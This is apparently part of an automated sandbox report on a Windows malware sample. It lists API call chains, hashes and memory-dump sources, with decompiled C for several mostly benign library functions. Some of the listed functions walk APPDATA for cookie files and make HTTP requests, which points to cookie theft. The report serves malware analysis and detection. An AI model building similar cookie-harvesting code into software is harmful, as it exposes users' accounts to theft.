                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$Enter$H_prolog3_catchInitializeLeave
                                                                                                                • String ID:
                                                                                                                • API String ID: 1641187343-0
                                                                                                                • Opcode ID: bc5d7f4ea80996bebceb1ffadac525dc4fdf0e9b80b8ff5e2c413949f48c1083
                                                                                                                • Instruction ID: 7a7219dbfed6f851243fbea11aabbe18b1edfef10b80ed42ba8a4532fe420df5
                                                                                                                • Opcode Fuzzy Hash: bc5d7f4ea80996bebceb1ffadac525dc4fdf0e9b80b8ff5e2c413949f48c1083
                                                                                                                • Instruction Fuzzy Hash: BCE0463492020BAFEB50BBA8C000BAEBB60BF31332F205120E1405A2C1EFB045948B25
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0128345B, Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 012861EA: __lock.LIBCMT ref: 012861EC
                                                                                                                • __onexit_nolock.LIBCMT ref: 01283477
                                                                                                                  • Part of subcall function 0128349F: RtlDecodePointer.NTDLL(?,?,00000000,?,?,0128347C,?,012A7610,0000000C,01283562,?,?,0128610B,012896FC,?,012837C9), ref: 012834B2
                                                                                                                  • Part of subcall function 0128349F: DecodePointer.KERNEL32(?,?,00000000,?,?,0128347C,?,012A7610,0000000C,01283562,?,?,0128610B,012896FC,?,012837C9), ref: 012834BD
                                                                                                                  • Part of subcall function 0128349F: __realloc_crt.LIBCMT ref: 012834FE
                                                                                                                  • Part of subcall function 0128349F: __realloc_crt.LIBCMT ref: 01283512
                                                                                                                  • Part of subcall function 0128349F: EncodePointer.KERNEL32(00000000,?,?,00000000,?,?,0128347C,?,012A7610,0000000C,01283562,?,?,0128610B,012896FC), ref: 01283524
                                                                                                                  • Part of subcall function 0128349F: EncodePointer.KERNEL32(?,?,?,00000000,?,?,0128347C,?,012A7610,0000000C,01283562,?,?,0128610B,012896FC), ref: 01283532
                                                                                                                  • Part of subcall function 0128349F: EncodePointer.KERNEL32(00000004,?,?,00000000,?,?,0128347C,?,012A7610,0000000C,01283562,?,?,0128610B,012896FC), ref: 0128353E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Pointer$Encode$Decode__realloc_crt$__lock__onexit_nolock
                                                                                                                • String ID:
                                                                                                                • API String ID: 3536590627-0
                                                                                                                • Opcode ID: a5557bf516ef25015cbc1f9e1440ce2f8f346ba155481b4a4094c3efad5f750f
                                                                                                                • Instruction ID: e6a03b685f3c1dfe22f0f9ed544f60ebcbe49ce15738bfa036d83e95cfb43fbf
                                                                                                                • Opcode Fuzzy Hash: a5557bf516ef25015cbc1f9e1440ce2f8f346ba155481b4a4094c3efad5f750f
                                                                                                                • Instruction Fuzzy Hash: C1D01271D22206ABDB11FBA9980477CB660BF20B23F504645E414A61D1CBB58A054F45
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1007FF6C, Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 1008C71B: __lock.LIBCMT ref: 1008C71D
                                                                                                                • __onexit_nolock.LIBCMT ref: 1007FF88
                                                                                                                  • Part of subcall function 1007FFB0: RtlDecodePointer.NTDLL(00000000,?,?,?,?,1007FF8D,?,100CE660,0000000C,10080073,?,?,10003189,100A6D60,10004A1D,?), ref: 1007FFC3
                                                                                                                  • Part of subcall function 1007FFB0: DecodePointer.KERNEL32(?,?,1007FF8D,?,100CE660,0000000C,10080073,?,?,10003189,100A6D60,10004A1D,?,00000000,?), ref: 1007FFCE
                                                                                                                  • Part of subcall function 1007FFB0: __realloc_crt.LIBCMT ref: 1008000F
                                                                                                                  • Part of subcall function 1007FFB0: __realloc_crt.LIBCMT ref: 10080023
                                                                                                                  • Part of subcall function 1007FFB0: EncodePointer.KERNEL32(00000000,?,?,1007FF8D,?,100CE660,0000000C,10080073,?,?,10003189,100A6D60,10004A1D,?,00000000,?), ref: 10080035
                                                                                                                  • Part of subcall function 1007FFB0: EncodePointer.KERNEL32(?,?,?,1007FF8D,?,100CE660,0000000C,10080073,?,?,10003189,100A6D60,10004A1D,?,00000000,?), ref: 10080043
                                                                                                                  • Part of subcall function 1007FFB0: EncodePointer.KERNEL32(00000004,?,?,1007FF8D,?,100CE660,0000000C,10080073,?,?,10003189,100A6D60,10004A1D,?,00000000,?), ref: 1008004F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Pointer$Encode$Decode__realloc_crt$__lock__onexit_nolock
                                                                                                                • String ID:
                                                                                                                • API String ID: 3536590627-0
                                                                                                                • Opcode ID: ce6f01074c7ed148bc03d19b31e5a7c924e60f8ebcd308025129fc504f16cc70
                                                                                                                • Instruction ID: c553a634c98afd8b588560ea25e486aa327d65f179710875797e89f6c33d6656
                                                                                                                • Opcode Fuzzy Hash: ce6f01074c7ed148bc03d19b31e5a7c924e60f8ebcd308025129fc504f16cc70
                                                                                                                • Instruction Fuzzy Hash: 7DD012B5C1520D9ADB10DBA4C806FAC7A74EF05366F10815AF154A6182CB781A054F85
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10080205, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: __fsopen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3646066109-0
                                                                                                                • Opcode ID: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                                                                                                                • Instruction ID: 5f8e0376387f3e41e6fd5a59f77a0ed6c98565435054c9b5235ff6f7f81bc48c
                                                                                                                • Opcode Fuzzy Hash: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                                                                                                                • Instruction Fuzzy Hash: 35B0927694020C7BCE415A82EC02A497F1AAB40760F408021FB0C1C171A6B3A6609689
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012637EB, Relevance: 1.3, APIs: 1, Instructions: 35COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,000000FF,00000000,00000000,00000000), ref: 0126381E
                                                                                                                  • Part of subcall function 01263EE5: MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,000000FF,00000000,00000000,?,80070057,?,?,?,01263E88,00000000,?,?,01264452), ref: 01263EF4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide
                                                                                                                • String ID:
                                                                                                                • API String ID: 626452242-0
                                                                                                                • Opcode ID: a08f54fa3d48dfefe3ec185e875d27e671648dc497736a2df1ce0d3065b8631b
                                                                                                                • Instruction ID: af9c14b1b471d7813e716fee7edf68dd894e54e46e5d98c6aebe2799fffa1b3b
                                                                                                                • Opcode Fuzzy Hash: a08f54fa3d48dfefe3ec185e875d27e671648dc497736a2df1ce0d3065b8631b
                                                                                                                • Instruction Fuzzy Hash: 26F0E53222516676EA20A69D9C04FFE3A4DAFA56B1F140226B60DE61C0CAA04CC242F5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01263EE5, Relevance: 1.3, APIs: 1, Instructions: 13COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,000000FF,00000000,00000000,?,80070057,?,?,?,01263E88,00000000,?,?,01264452), ref: 01263EF4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide
                                                                                                                • String ID:
                                                                                                                • API String ID: 626452242-0
                                                                                                                • Opcode ID: c375910dda81e869a99814073f758ba789bb9efe473e7fecf98894541816ca88
                                                                                                                • Instruction ID: 4f41f120b9d32295948e636c7a022056baca5c0b8ac5a640e70c2368e302bb00
                                                                                                                • Opcode Fuzzy Hash: c375910dda81e869a99814073f758ba789bb9efe473e7fecf98894541816ca88
                                                                                                                • Instruction Fuzzy Hash: AEC048B11482097EFE016AA8AC19E763B5CD750634F108258BE28D42D4E962995056A2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                Function 1000AA5D, Relevance: 77.3, APIs: 30, Strings: 14, Instructions: 344networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 1000AACA
                                                                                                                • _memset.LIBCMT ref: 1000AAE4
                                                                                                                • _memset.LIBCMT ref: 1000AAFB
                                                                                                                • _memset.LIBCMT ref: 1000AB12
                                                                                                                • _memset.LIBCMT ref: 1000AB2C
                                                                                                                • InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 1000ABC8
                                                                                                                • _wprintf.LIBCMT ref: 1000AC28
                                                                                                                • InternetConnectA.WININET(00000000,?,00000000,100BAB05,100BAB05,00000003,00000000,00000000), ref: 1000AC75
                                                                                                                • _wprintf.LIBCMT ref: 1000AC8C
                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 1000AC93
                                                                                                                • HttpOpenRequestA.WININET(00000000,GET,?,00000000,100BAB05,00000000,80EC0200,00000000), ref: 1000ACC8
                                                                                                                • _wprintf.LIBCMT ref: 1000ACD9
                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 1000ACE6
                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 1000AEB7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Internet_memset$CloseHandle_wprintf$ConnectCrackHttpOpenRequest
                                                                                                                • String ID: $GET$HttpAddRequestHeaders failed$HttpOpenRequest failed$HttpQueryInfo failed$HttpSendRequest failed. %d $InternetConnect failed.$InternetOpen failed$InternetReadFile failed. errCode: %s$StatusCode: %d$error, it's not HTTP url!$error, url can not be analysised!$https://$x
                                                                                                                • API String ID: 2918611166-2039668183
                                                                                                                • Opcode ID: cb6003902a1b048daca0cbd3305a64b54b2de211aa08a22f79de04df5f633aa4
                                                                                                                • Instruction ID: c7187d59e1cdabd4f160dfc8bcc9ca18983d853fa82ff9a6d64b14068145d816
                                                                                                                • Opcode Fuzzy Hash: cb6003902a1b048daca0cbd3305a64b54b2de211aa08a22f79de04df5f633aa4
                                                                                                                • Instruction Fuzzy Hash: A1C18175904268AFFB20DB60CC85FEE77B8FB45390F10419AF909A6281DB74AE94CF51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10009DF3, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 97fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 10009E3B
                                                                                                                • GetEnvironmentVariableW.KERNEL32(APPDATA,?,00000104), ref: 10009E54
                                                                                                                  • Part of subcall function 10007B5C: __vsnprintf_s.LIBCMT ref: 10007B71
                                                                                                                • _wprintf.LIBCMT ref: 10009E9D
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 10009EB3
                                                                                                                • __snprintf_s.LIBCMT ref: 10009EE8
                                                                                                                  • Part of subcall function 1008021F: __vsnwprintf_s_l.LIBCMT ref: 10080234
                                                                                                                  • Part of subcall function 10009F42: __EH_prolog3_GS.LIBCMT ref: 10009F49
                                                                                                                  • Part of subcall function 10009F42: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,00000060,10009EFE,?), ref: 10009F66
                                                                                                                  • Part of subcall function 10009F42: GetFileSize.KERNEL32(00000000,00000000), ref: 10009F79
                                                                                                                  • Part of subcall function 10009F42: _malloc.LIBCMT ref: 10009F96
                                                                                                                  • Part of subcall function 10009F42: _memset.LIBCMT ref: 10009FB0
                                                                                                                  • Part of subcall function 10009F42: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10009FC1
                                                                                                                  • Part of subcall function 10009F42: CloseHandle.KERNEL32(00000000), ref: 10009FCC
                                                                                                                  • Part of subcall function 10009F42: _free.LIBCMT ref: 10009FD3
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 10009F06
                                                                                                                • FindClose.KERNEL32(00000000), ref: 10009F11
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: File$Find$Close_memset$CreateEnvironmentFirstH_prolog3_HandleNextReadSizeVariable__snprintf_s__vsnprintf_s__vsnwprintf_s_l_free_malloc_wprintf
                                                                                                                • String ID: cookie_path:%S$%s\%s$%s\*$APPDATA
                                                                                                                • API String ID: 2614657368-3324629276
                                                                                                                • Opcode ID: e0a5f5534b67b1c540831e3323af2182623549bb28422e05b3eea910a1ca3415
                                                                                                                • Instruction ID: 11352941393fa5feb41a1f970ce0132f11a08a1967b15d5b01a37a6cc9b2526c
                                                                                                                • Opcode Fuzzy Hash: e0a5f5534b67b1c540831e3323af2182623549bb28422e05b3eea910a1ca3415
                                                                                                                • Instruction Fuzzy Hash: AC31A6B5D0021DABD710DB64CCC9FEAB7ACEB10350F0406A5FA18E3181DB71AE958BA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01270B52, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 82COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 31%
                                                                                                                			E01270B52(void* __ebx, void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				void* _t14;
				struct HINSTANCE__* _t15;
				_Unknown_base(*)()* _t16;
				struct HINSTANCE__* _t18;
				intOrPtr _t19;
				void* _t26;
				void* _t27;
				intOrPtr* _t33;
				void* _t34;
				intOrPtr _t37;
				signed int* _t39;
				void* _t41;

				_t26 = __ebx;
				_t41 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x1c)) == 0) {
					_t37 = 1;
					if( *((intOrPtr*)(__ecx + 0x20)) != 0) {
						L5:
						_t15 = E0126AA72(_t26, _t34, L"D2D1.dll");
						 *(_t41 + 4) = _t15;
						if(_t15 != 0) {
							_push(_t26);
							_t27 = GetProcAddress;
							_t16 = GetProcAddress(_t15, "D2D1CreateFactory");
							if(_t16 == 0) {
								L11:
								 *((intOrPtr*)(_t41 + 0x18)) = GetProcAddress( *(_t41 + 4), "D2D1MakeRotateMatrix");
								_t18 = E0126AA72(_t27, _t34, L"DWrite.dll");
								 *(_t41 + 8) = _t18;
								if(_t18 != 0) {
									_t33 = GetProcAddress(_t18, "DWriteCreateFactory");
									if(_t33 != 0) {
										_t10 = _t41 + 0x10; // 0x10
										 *_t33(_a8, 0x129b224, _t10);
									}
								}
								_t12 = _t41 + 0x14; // 0x14
								__imp__CoCreateInstance(0x129b260, 0, _t37, 0x12a0e28, _t12);
								 *((intOrPtr*)(_t41 + 0x1c)) = _t37;
								_t19 = _t37;
								L15:
								L16:
								return _t19;
							}
							_t5 = _t41 + 0xc; // 0xc
							_t39 = _t5;
							_push(_t39);
							_push(0);
							_push(0x129b214);
							_push(_a4);
							if( *_t16() >= 0) {
								_t37 = 1;
								goto L11;
							}
							 *_t39 =  *_t39 & 0x00000000;
							_t19 = 0;
							goto L15;
						}
						L6:
						_t19 = 0;
						goto L16;
					}
					__imp__CoInitialize(0);
					if(_t14 < 0) {
						goto L6;
					}
					 *((intOrPtr*)(__ecx + 0x20)) = 1;
					goto L5;
				}
				return 1;
			}















                                                                                                                0x01270b52
                                                                                                                0x01270b56
                                                                                                                0x01270b5c
                                                                                                                0x01270b69
                                                                                                                0x01270b6e
                                                                                                                0x01270b7f
                                                                                                                0x01270b84
                                                                                                                0x01270b89
                                                                                                                0x01270b8f
                                                                                                                0x01270b98
                                                                                                                0x01270b99
                                                                                                                0x01270ba5
                                                                                                                0x01270ba9
                                                                                                                0x01270bc9
                                                                                                                0x01270bd8
                                                                                                                0x01270bdb
                                                                                                                0x01270be0
                                                                                                                0x01270be6
                                                                                                                0x01270bf0
                                                                                                                0x01270bf4
                                                                                                                0x01270bf6
                                                                                                                0x01270c02
                                                                                                                0x01270c02
                                                                                                                0x01270bf4
                                                                                                                0x01270c04
                                                                                                                0x01270c15
                                                                                                                0x01270c1b
                                                                                                                0x01270c1e
                                                                                                                0x01270c20
                                                                                                                0x01270c21
                                                                                                                0x00000000
                                                                                                                0x01270c21
                                                                                                                0x01270bab
                                                                                                                0x01270bab
                                                                                                                0x01270bae
                                                                                                                0x01270baf
                                                                                                                0x01270bb1
                                                                                                                0x01270bb6
                                                                                                                0x01270bbd
                                                                                                                0x01270bc8
                                                                                                                0x00000000
                                                                                                                0x01270bc8
                                                                                                                0x01270bbf
                                                                                                                0x01270bc2
                                                                                                                0x00000000
                                                                                                                0x01270bc2
                                                                                                                0x01270b91
                                                                                                                0x01270b91
                                                                                                                0x00000000
                                                                                                                0x01270b91
                                                                                                                0x01270b72
                                                                                                                0x01270b7a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01270b7c
                                                                                                                0x00000000
                                                                                                                0x01270b7c
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • CoInitialize.OLE32(00000000), ref: 01270B72
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Initialize
                                                                                                                • String ID: D2D1.dll$D2D1CreateFactory$D2D1MakeRotateMatrix$DWrite.dll$DWriteCreateFactory
                                                                                                                • API String ID: 2538663250-1403614551
                                                                                                                • Opcode ID: de82a4f758462bb87cf4988420c1b3e909bd0a1e5fe828e1c62741f9b7c1530b
                                                                                                                • Instruction ID: 579b789b547578687394c78023051da8638d373dd6929b0d446b1f1cdd27bbe6
                                                                                                                • Opcode Fuzzy Hash: de82a4f758462bb87cf4988420c1b3e909bd0a1e5fe828e1c62741f9b7c1530b
                                                                                                                • Instruction Fuzzy Hash: 0621C931670702AEEB205E7BEC05F2B77E8EB86B14F00492DB646D1550E7B0E5088714
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012746B9, Relevance: 13.6, APIs: 9, Instructions: 135fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 98%
                                                                                                                			E012746B9(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				long _t46;
				signed char _t59;
				void* _t61;
				CHAR* _t63;
				void* _t68;
				CHAR* _t80;
				void* _t81;
				intOrPtr _t94;
				CHAR* _t96;
				void* _t97;

				_t91 = __edx;
				_t81 = __ecx;
				_push(0x158);
				E01285BAD(E01297A65, __ebx, __edi, __esi);
				_t96 =  *(_t97 + 8);
				_t80 =  *(_t97 + 0xc);
				_t94 =  *((intOrPtr*)(_t97 + 0x10));
				 *(_t97 - 0x158) = _t96;
				if((0 | _t96 != 0x00000000) != 0) {
					L2:
					if((0 | _t80 != 0x00000000) == 0) {
						goto L1;
					}
					_t46 = GetFullPathNameA(_t80, 0x104, _t96, _t97 - 0x154);
					if(_t46 != 0) {
						if(_t46 < 0x104) {
							E01261AE0(_t97 - 0x15c, _t94, _t96, E0126811C());
							 *(_t97 - 4) =  *(_t97 - 4) & 0x00000000;
							E0127404A(_t96, _t97 - 0x15c);
							_t96 =  *(_t97 - 0x15c);
							if(PathIsUNCA(_t96) != 0) {
								L21:
								E012615E0(_t96 - 0x10, _t91);
								goto L22;
							}
							if(GetVolumeInformationA(_t96, 0, 0, 0, _t97 - 0x164, _t97 - 0x160, 0, 0) != 0) {
								_t59 =  *(_t97 - 0x160);
								if((_t59 & 0x00000002) == 0) {
									CharUpperA( *(_t97 - 0x158));
									_t59 =  *(_t97 - 0x160);
								}
								if((_t59 & 0x00000004) != 0) {
									goto L21;
								} else {
									_t61 = FindFirstFileA(_t80, _t97 - 0x150);
									if(_t61 == 0xffffffff) {
										goto L21;
									}
									FindClose(_t61);
									_t63 =  *(_t97 - 0x154);
									if(_t63 == 0 || _t63 <=  *(_t97 - 0x158)) {
										goto L11;
									} else {
										_t68 = E01283900(_t97 - 0x124);
										_t91 =  *(_t97 - 0x154) -  *(_t97 - 0x158);
										if(_t68 +  *(_t97 - 0x154) -  *(_t97 - 0x158) >= 0x104) {
											if(_t94 != 0) {
												 *((intOrPtr*)(_t94 + 8)) = 3;
												E012627DE(_t80, _t94 + 0x10, _t96, _t80);
											}
											L12:
											E012615E0(_t96 - 0x10, _t91);
											goto L5;
										}
										E012638EE(0x104 - _t91, E01286C91( *(_t97 - 0x154), 0x104 - _t91, _t97 - 0x124));
										goto L21;
									}
								}
							}
							L11:
							E0127468C(_t80, _t94, _t80);
							goto L12;
						}
						if(_t94 != 0) {
							 *((intOrPtr*)(_t94 + 8)) = 3;
							E012627DE(_t80, _t94 + 0x10, _t96, _t80);
						}
						goto L5;
					} else {
						E012638EE(_t81, E012864CF(_t96, 0x104, _t80, 0xffffffff));
						E0127468C(_t80, _t94, _t80);
						L5:
						L22:
						return E01285B5C(_t80, _t94, _t96);
					}
				}
				L1:
				E01268275(_t81);
				goto L2;
			}













                                                                                                                0x012746b9
                                                                                                                0x012746b9
                                                                                                                0x012746b9
                                                                                                                0x012746c3
                                                                                                                0x012746c8
                                                                                                                0x012746cd
                                                                                                                0x012746d2
                                                                                                                0x012746d8
                                                                                                                0x012746e0
                                                                                                                0x012746e7
                                                                                                                0x012746f0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01274700
                                                                                                                0x01274708
                                                                                                                0x01274734
                                                                                                                0x01274758
                                                                                                                0x0127475d
                                                                                                                0x01274769
                                                                                                                0x0127476e
                                                                                                                0x0127477d
                                                                                                                0x01274845
                                                                                                                0x01274848
                                                                                                                0x00000000
                                                                                                                0x0127484f
                                                                                                                0x012747a1
                                                                                                                0x012747b7
                                                                                                                0x012747bf
                                                                                                                0x012747c7
                                                                                                                0x012747cd
                                                                                                                0x012747cd
                                                                                                                0x012747d5
                                                                                                                0x00000000
                                                                                                                0x012747d7
                                                                                                                0x012747df
                                                                                                                0x012747e8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012747eb
                                                                                                                0x012747f1
                                                                                                                0x012747f9
                                                                                                                0x00000000
                                                                                                                0x01274803
                                                                                                                0x0127480a
                                                                                                                0x01274815
                                                                                                                0x01274825
                                                                                                                0x0127485a
                                                                                                                0x01274864
                                                                                                                0x0127486b
                                                                                                                0x0127486b
                                                                                                                0x012747aa
                                                                                                                0x012747ad
                                                                                                                0x00000000
                                                                                                                0x012747ad
                                                                                                                0x0127483d
                                                                                                                0x00000000
                                                                                                                0x01274842
                                                                                                                0x012747f9
                                                                                                                0x012747d5
                                                                                                                0x012747a3
                                                                                                                0x012747a5
                                                                                                                0x00000000
                                                                                                                0x012747a5
                                                                                                                0x01274738
                                                                                                                0x0127473e
                                                                                                                0x01274745
                                                                                                                0x01274745
                                                                                                                0x00000000
                                                                                                                0x0127470a
                                                                                                                0x01274719
                                                                                                                0x01274723
                                                                                                                0x01274728
                                                                                                                0x01274850
                                                                                                                0x01274855
                                                                                                                0x01274855
                                                                                                                0x01274708
                                                                                                                0x012746e2
                                                                                                                0x012746e2
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 012746C3
                                                                                                                • GetFullPathNameA.KERNEL32(?,00000104,?,?,00000158,01273FCF,?,?,00000000), ref: 01274700
                                                                                                                • __cftof.LIBCMT ref: 01274713
                                                                                                                  • Part of subcall function 01268275: __CxxThrowException@8.LIBCMT ref: 01268289
                                                                                                                • PathIsUNCA.SHLWAPI(?,?,?,00000000), ref: 01274775
                                                                                                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 01274799
                                                                                                                • CharUpperA.USER32(?), ref: 012747C7
                                                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 012747DF
                                                                                                                • FindClose.KERNEL32(00000000), ref: 012747EB
                                                                                                                • _strlen.LIBCMT ref: 0127480A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
